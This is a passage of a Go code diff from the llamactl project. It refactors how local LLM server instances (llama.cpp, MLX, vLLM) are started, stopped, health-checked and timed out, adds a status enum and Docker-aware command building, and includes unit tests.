return fmt.Errorf("failed to create log files: %w", err)
}
args := i.options.BuildCommandArgs()
// Build command using backend-specific methods
cmd, cmdErr := i.buildCommand()
if cmdErr != nil {
return fmt.Errorf("failed to build command: %w", cmdErr)
}
i.ctx, i.cancel = context.WithCancel(context.Background())
i.cmd = exec.CommandContext(i.ctx, "llama-server", args...)
i.cmd = cmd
if runtime.GOOS != "windows" {
setProcAttrs(i.cmd)
@@ -61,7 +72,7 @@ func (i *Instance) Start() error {
return fmt.Errorf("failed to start instance %s: %w", i.Name, err)
}
i.Running = true
i.SetStatus(Running)
// Create channel for monitor completion signaling
i.monitorDone = make(chan struct{})
@@ -75,10 +86,10 @@ func (i *Instance) Start() error {
}
// Stop terminates the subprocess
func (i *Instance) Stop() error {
func (i *Process) Stop() error {
i.mu.Lock()
if !i.Running {
if !i.IsRunning() {
// Even if not running, cancel any pending restart
if i.restartCancel != nil {
i.restartCancel()
@@ -95,8 +106,8 @@ func (i *Instance) Stop() error {
i.restartCancel = nil
}
// Set running to false first to signal intentional stop
i.Running = false
// Set status to stopped first to signal intentional stop
i.SetStatus(Stopped)
// Clean up the proxy
i.proxy = nil
@@ -106,19 +117,25 @@ func (i *Instance) Stop() error {
i.mu.Unlock()
// Stop the process with SIGINT
if i.cmd.Process != nil {
// Stop the process with SIGINT if cmd exists
if i.cmd != nil && i.cmd.Process != nil {
if err := i.cmd.Process.Signal(syscall.SIGINT); err != nil {
log.Printf("Failed to send SIGINT to instance %s: %v", i.Name, err)
}
}
// If no process exists, we can return immediately
if i.cmd == nil || monitorDone == nil {
i.logger.Close()
return nil
}
select {
case <-monitorDone:
// Process exited normally
case <-time.After(30 * time.Second):
// Force kill if it doesn't exit within 30 seconds
if i.cmd.Process != nil {
if i.cmd != nil && i.cmd.Process != nil {
killErr := i.cmd.Process.Kill()
if killErr != nil {
log.Printf("Failed to force kill instance %s: %v", i.Name, killErr)
@@ -140,7 +157,97 @@ func (i *Instance) Stop() error {
return nil
}
func (i *Instance) monitorProcess() {
func (i *Process) LastRequestTime() int64 {
return i.lastRequestTime.Load()
}
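// WaitForHealthy blocks until the instance's /health endpoint returns 200 OK
// or the timeout (in seconds, defaulting to 30 when non-positive) elapses.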
func (i *Process) WaitForHealthy(timeout int) error {
if !i.IsRunning() {
return fmt.Errorf("instance %s is not running", i.Name)
}
if timeout <= 0 {
timeout = 30 // Default to 30 seconds if no timeout is specified
}
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
defer cancel()
// Get instance options to build the health check URL
opts := i.GetOptions()
if opts == nil {
return fmt.Errorf("instance %s has no options set", i.Name)
}
// Build the health check URL directly
var host string
var port int
switch opts.BackendType {
case backends.BackendTypeLlamaCpp:
if opts.LlamaServerOptions != nil {
host = opts.LlamaServerOptions.Host
port = opts.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if opts.MlxServerOptions != nil {
host = opts.MlxServerOptions.Host
port = opts.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if opts.VllmServerOptions != nil {
host = opts.VllmServerOptions.Host
port = opts.VllmServerOptions.Port
}
}
if host == "" {
host = "localhost"
}
healthURL := fmt.Sprintf("http://%s:%d/health", host, port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
Timeout: 5 * time.Second, // 5 second timeout per request
}
// Helper function to check health directly
checkHealth := func() bool {
req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
if err != nil {
return false
}
resp, err := client.Do(req)
if err != nil {
return false
}
defer resp.Body.Close()
return resp.StatusCode == http.StatusOK
}
// Try immediate check first
if checkHealth() {
return nil // Instance is healthy
}
// If immediate check failed, start polling
ticker := time.NewTicker(1 * time.Second)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
case <-ticker.C:
if checkHealth() {
return nil // Instance is healthy
}
// Continue polling
}
}
}
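// Illustrative sketch (not part of the original source): a caller that starts
// an instance and blocks until the backend answers health checks, assuming a
// *Process created elsewhere.
func exampleStartAndWait(inst *Process) error {
    if err := inst.Start(); err != nil {
        return err
    }
    // Poll the health endpoint for up to 60 seconds.
    return inst.WaitForHealthy(60)
}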
func (i *Process) monitorProcess() {
defer func() {
i.mu.Lock()
if i.monitorDone != nil {
@@ -155,12 +262,12 @@ func (i *Instance) monitorProcess() {
i.mu.Lock()
// Check if the instance was intentionally stopped
if !i.Running {
if !i.IsRunning() {
i.mu.Unlock()
return
}
i.Running = false
i.SetStatus(Stopped)
i.logger.Close()
// Cancel any existing restart context since we're handling a new exit
@@ -181,10 +288,11 @@ func (i *Instance) monitorProcess() {
}
// handleRestart manages the restart process while holding the lock
func (i *Instance) handleRestart() {
func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart {
i.SetStatus(Failed)
i.mu.Unlock()
return
}
@@ -223,7 +331,7 @@ func (i *Instance) handleRestart() {
}
// validateRestartConditions checks if the instance should be restarted and returns the parameters
func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
if i.options == nil {
log.Printf("Instance %s not restarting: options are nil", i.Name)
return false, 0, 0
@@ -255,3 +363,49 @@ func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts
return true, maxRestarts, restartDelay
}
// buildCommand builds the command to execute using backend-specific logic
func (i *Process) buildCommand() (*exec.Cmd, error) {
// Get backend configuration
backendConfig, err := i.getBackendConfig()
if err != nil {
return nil, err
}
// Build the environment variables
env := i.options.BuildEnvironment(backendConfig)
// Get the command to execute
command := i.options.GetCommand(backendConfig)
// Build command arguments
args := i.options.BuildCommandArgs(backendConfig)
// Create the exec.Cmd
cmd := exec.CommandContext(i.ctx, command, args...)
cmd.Env = []string{}
for k, v := range env {
cmd.Env = append(cmd.Env, fmt.Sprintf("%s=%s", k, v))
}
return cmd, nil
}
// getBackendConfig resolves the backend configuration for the current instance
func (i *Process) getBackendConfig() (*config.BackendSettings, error) {
var backendTypeStr string
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
backendTypeStr = "llama-cpp"
case backends.BackendTypeMlxLm:
backendTypeStr = "mlx"
case backends.BackendTypeVllm:
backendTypeStr = "vllm"
default:
return nil, fmt.Errorf("unsupported backend type: %s", i.options.BackendType)
}
settings := i.globalBackendSettings.GetBackendSettings(backendTypeStr)
return &settings, nil
}
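// Illustrative note (not part of the original source): for a hypothetical
// Docker-enabled llama.cpp backend, buildCommand therefore yields roughly
//
//	command: "docker"
//	args:    [<Docker args>..., <image>, <llama-server flags>...]
//	env:     backend environment, then Docker environment, then per-instance
//	         environment (later entries win)
//
// while a native backend runs backendConfig.Command with backendConfig.Args
// followed by the backend-specific flags.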

View File

@@ -1,4 +1,4 @@
package llamactl
package instance
import (
"bufio"
@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
}
// GetLogs retrieves the last n lines of logs from the instance
func (i *Instance) GetLogs(num_lines int) (string, error) {
func (i *Process) GetLogs(num_lines int) (string, error) {
i.mu.RLock()
logFileName := i.logger.logFilePath
i.mu.RUnlock()

265
pkg/instance/options.go Normal file
View File

@@ -0,0 +1,265 @@
package instance
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"log"
"maps"
)
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"` // seconds
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"` // minutes
// Environment variables
Environment map[string]string `json:"environment,omitempty"`
BackendType backends.BackendType `json:"backend_type"`
BackendOptions map[string]any `json:"backend_options,omitempty"`
// Backend-specific options
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
MlxServerOptions *mlx.MlxServerOptions `json:"-"`
VllmServerOptions *vllm.VllmServerOptions `json:"-"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := &struct {
*Alias
}{
Alias: (*Alias)(c),
}
if err := json.Unmarshal(data, aux); err != nil {
return err
}
// Parse backend-specific options
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.BackendOptions != nil {
// Convert map to JSON and then unmarshal to LlamaServerOptions
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
}
}
case backends.BackendTypeMlxLm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.MlxServerOptions = &mlx.MlxServerOptions{}
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
}
}
case backends.BackendTypeVllm:
if c.BackendOptions != nil {
optionsData, err := json.Marshal(c.BackendOptions)
if err != nil {
return fmt.Errorf("failed to marshal backend options: %w", err)
}
c.VllmServerOptions = &vllm.VllmServerOptions{}
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
}
}
default:
return fmt.Errorf("unknown backend type: %s", c.BackendType)
}
return nil
}
// MarshalJSON implements custom JSON marshaling for CreateInstanceOptions
func (c *CreateInstanceOptions) MarshalJSON() ([]byte, error) {
// Use anonymous struct to avoid recursion
type Alias CreateInstanceOptions
aux := struct {
*Alias
}{
Alias: (*Alias)(c),
}
// Convert backend-specific options back to BackendOptions map for JSON
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
data, err := json.Marshal(c.LlamaServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal llama server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
data, err := json.Marshal(c.MlxServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal MLX server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
data, err := json.Marshal(c.VllmServerOptions)
if err != nil {
return nil, fmt.Errorf("failed to marshal vLLM server options: %w", err)
}
var backendOpts map[string]any
if err := json.Unmarshal(data, &backendOpts); err != nil {
return nil, fmt.Errorf("failed to unmarshal to map: %w", err)
}
aux.BackendOptions = backendOpts
}
}
return json.Marshal(aux)
}
// ValidateAndApplyDefaults clamps invalid values and fills nil fields with defaults from the global settings
func (c *CreateInstanceOptions) ValidateAndApplyDefaults(name string, globalSettings *config.InstancesConfig) {
// Validate and apply constraints
if c.MaxRestarts != nil && *c.MaxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, *c.MaxRestarts)
*c.MaxRestarts = 0
}
if c.RestartDelay != nil && *c.RestartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, *c.RestartDelay)
*c.RestartDelay = 0
}
if c.IdleTimeout != nil && *c.IdleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
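// Worked example of the rules above: MaxRestarts = -5 is logged and clamped to
// 0; a nil AutoRestart inherits globalSettings.DefaultAutoRestart; a nil
// IdleTimeout defaults to 0, which ShouldTimeout treats as "never time out".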
func (c *CreateInstanceOptions) GetCommand(backendConfig *config.BackendSettings) string {
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
return "docker"
}
return backendConfig.Command
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs(backendConfig *config.BackendSettings) []string {
var args []string
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
// For Docker, start with Docker args
args = append(args, backendConfig.Docker.Args...)
args = append(args, backendConfig.Docker.Image)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildDockerArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildDockerArgs()...)
}
}
} else {
// For native execution, start with backend args
args = append(args, backendConfig.Args...)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
args = append(args, c.MlxServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildCommandArgs()...)
}
}
}
return args
}
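// Worked example of the two branches above (placeholder values):
// Docker enabled, llama.cpp backend -> args after the "docker" command:
// <Docker.Args...> <Docker.Image> <LlamaServerOptions.BuildDockerArgs()...>
// Native execution -> args after backendConfig.Command:
// <backendConfig.Args...> <LlamaServerOptions.BuildCommandArgs()...>
// MLX never takes the Docker branch, matching the check in GetCommand above.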
func (c *CreateInstanceOptions) BuildEnvironment(backendConfig *config.BackendSettings) map[string]string {
env := map[string]string{}
if backendConfig.Environment != nil {
maps.Copy(env, backendConfig.Environment)
}
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
if backendConfig.Docker.Environment != nil {
maps.Copy(env, backendConfig.Docker.Environment)
}
}
if c.Environment != nil {
maps.Copy(env, c.Environment)
}
return env
}
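// --- Editor's sketch (illustrative; not part of the original file) ---
// How a caller might combine the three helpers above to launch an instance.
// Assumes the caller imports "os" and "os/exec"; backendCfg is the
// config.BackendSettings entry for this instance's backend type.
func exampleLaunchCommand(c *CreateInstanceOptions, backendCfg *config.BackendSettings) *exec.Cmd {
cmd := exec.Command(c.GetCommand(backendCfg), c.BuildCommandArgs(backendCfg)...)
cmd.Env = os.Environ() // inherit the parent environment
for k, v := range c.BuildEnvironment(backendCfg) {
cmd.Env = append(cmd.Env, k+"="+v) // backend, Docker and per-instance variables
}
return cmd
}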

View File

@@ -1,6 +1,6 @@
//go:build !windows
package llamactl
package instance
import (
"os/exec"

View File

@@ -1,6 +1,6 @@
//go:build windows
package llamactl
package instance
import "os/exec"

70
pkg/instance/status.go Normal file
View File

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}
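// --- Editor's sketch (illustrative; not part of the original file) ---
// The enum above serializes as a lowercase string and degrades gracefully on
// unknown input, which keeps previously persisted instance files loadable.
func exampleStatusJSON() {
data, _ := json.Marshal(Running) // -> "running"
var s InstanceStatus
_ = json.Unmarshal([]byte(`"paused"`), &s) // unknown value: logged, falls back to Stopped
log.Printf("marshaled=%s unmarshaled=%d", data, s)
}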

28
pkg/instance/timeout.go Normal file
View File

@@ -0,0 +1,28 @@
package instance
// UpdateLastRequestTime updates the last request access time for the instance via proxy
func (i *Process) UpdateLastRequestTime() {
i.mu.Lock()
defer i.mu.Unlock()
lastRequestTime := i.timeProvider.Now().Unix()
i.lastRequestTime.Store(lastRequestTime)
}
func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := i.lastRequestTime.Load()
idleTimeoutMinutes := *i.options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}
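// Worked example of the check above: with IdleTimeout = 5 (minutes) the
// instance times out once timeProvider.Now().Unix() - lastRequestTime exceeds
// 5 * 60 = 300 seconds, i.e. five minutes after the last proxied request.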

View File

@@ -0,0 +1,274 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
idleTimeout *int
}{
{"nil timeout", nil},
{"zero timeout", testutil.IntPtr(0)},
{"negative timeout", testutil.IntPtr(-5)},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Simulate running state
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
}
})
}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
inputTimeout *int
expectedTimeout int
}{
{"default value when nil", nil, 0},
{"positive value", testutil.IntPtr(10), 10},
{"zero value", testutil.IntPtr(0), 0},
{"negative value gets corrected", testutil.IntPtr(-5), 0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
}
})
}
}

View File

@@ -1,442 +0,0 @@
package llamactl_test
import (
"encoding/json"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstance(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &llamactl.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Test with invalid negative values
invalidMaxRestarts := -5
invalidRestartDelay := -10
options := &llamactl.CreateInstanceOptions{
MaxRestarts: &invalidMaxRestarts,
RestartDelay: &invalidRestartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that negative values were corrected to 0
if opts.MaxRestarts == nil || *opts.MaxRestarts != 0 {
t.Errorf("Expected MaxRestarts to be corrected to 0, got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 0 {
t.Errorf("Expected RestartDelay to be corrected to 0, got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
// Update options
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
instance.SetOptions(newOptions)
opts := instance.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestSetOptions_NilOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
originalOptions := instance.GetOptions()
// Try to set nil options
instance.SetOptions(nil)
// Options should remain unchanged
currentOptions := instance.GetOptions()
if currentOptions.Model != originalOptions.Model {
t.Error("Options should not change when setting nil options")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
options := &llamactl.CreateInstanceOptions{
